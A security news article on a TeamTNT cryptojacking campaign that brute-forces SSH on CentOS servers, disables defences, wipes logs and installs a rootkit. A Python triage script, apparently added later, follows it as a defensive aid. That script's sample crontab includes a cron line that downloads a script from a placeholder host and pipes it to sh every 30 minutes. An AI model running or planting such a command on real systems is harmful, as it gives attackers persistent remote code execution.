Why do system logs disappear without a trace from hacked servers?
The TeamTNT cybercriminal group has stepped up again and launched a new cryptojacking campaign, targeting servers running the CentOS operating system. According to Group-IB, attackers use brute force attacks via SSH to penetrate virtual servers.
After gaining access, hackers download a malicious script that disables defense mechanisms, deletes logs, stops competing mining processes, and prevents system recovery. As a result of this chain of actions, hackers install the Diamorphine rootkit, which hides malicious processes and provides remote access to compromised hosts.
With moderate certainty, researchers attribute the identified attacks to the TeamTNT group due to the similarity of tactics and methods used in its past operations. TeamTNT was first spotted in 2019 conducting illegal cryptocurrency mining on cloud and container platforms. In 2021, the group announced the end of its activities, but since 2022, more and more attacks attributed to this group have been recorded.
In the new campaign, the malicious script first checks the infected system for traces of other cryptojacking operations. It then disables security systems such as SELinux, AppArmor, and the firewall. The attackers paid special attention to the "aliyun.service" service associated with the Alibaba cloud provider. If this service is detected, the script loads commands to remove it, freeing up resources for its own operations.
As noted above, the script eliminates competitors by killing the processes of other miners and removing their containers, as well as their associated images. To maintain control over the server, attackers set up cron tasks that download updates from a remote server every 30 minutes. In addition, they modify the SSH authorization file by adding a root account for permanent access.
To hide the traces of their activity, criminals change file attributes, create accounts with administrator access, and erase command history.
TeamTNT's ongoing attacks clearly show that a lull in cyberspace is an illusion. Hackers do not disappear, but improve. Every server is a potential target, and protecting it requires constant effort.
Source
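As an added example (not code from the post or from Group-IB's report), the following Python triage checks look for three of the artefacts the article lists on a compromised CentOS host: a cron job that pulls something from a remote server on a fixed short cycle, an unexpected entry in root's SSH authorized keys, and files marked immutable with chattr. The sample crontab, key file and lsattr output are constructed for the demonstration; the URL and key material are placeholders, not real indicators.

```python
import re

# Constructed sample inputs standing in for /etc/crontab, root's
# authorized_keys and `lsattr` output on a CentOS host; the cron URL
# and key material are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * root curl -fsSL http://C2-PLACEHOLDER.invalid/u.sh | sh
"""
SAMPLE_AUTH_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEY admin@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQPLACEHOLDERKEY root@localhost
"""
SAMPLE_LSATTR = """\
----i----------------- /root/.ssh/authorized_keys
---------------------- /etc/hosts
"""


def periodic_download_jobs(crontab_text):
    """System-crontab lines that run curl/wget on a */N minute cycle."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        minute_field = line.split()[0]
        if minute_field.startswith("*/") and re.search(r"\b(curl|wget)\b", line):
            hits.append(line)
    return hits


def unexpected_keys(auth_keys_text, allowed_comments):
    """Key comments (the trailing field) that are not on the known-good list."""
    found = []
    for line in auth_keys_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[-1] not in allowed_comments:
            found.append(parts[-1])
    return found


def immutable_files(lsattr_text):
    """Paths whose lsattr flags include 'i' (chattr +i blocks edits and deletion)."""
    flagged = []
    for line in lsattr_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            flagged.append(parts[1].strip())
    return flagged
```

On a live host, feed the functions the real /etc/crontab, /root/.ssh/authorized_keys and `lsattr -R /root /etc` output; a hit is a lead for review, not proof of compromise.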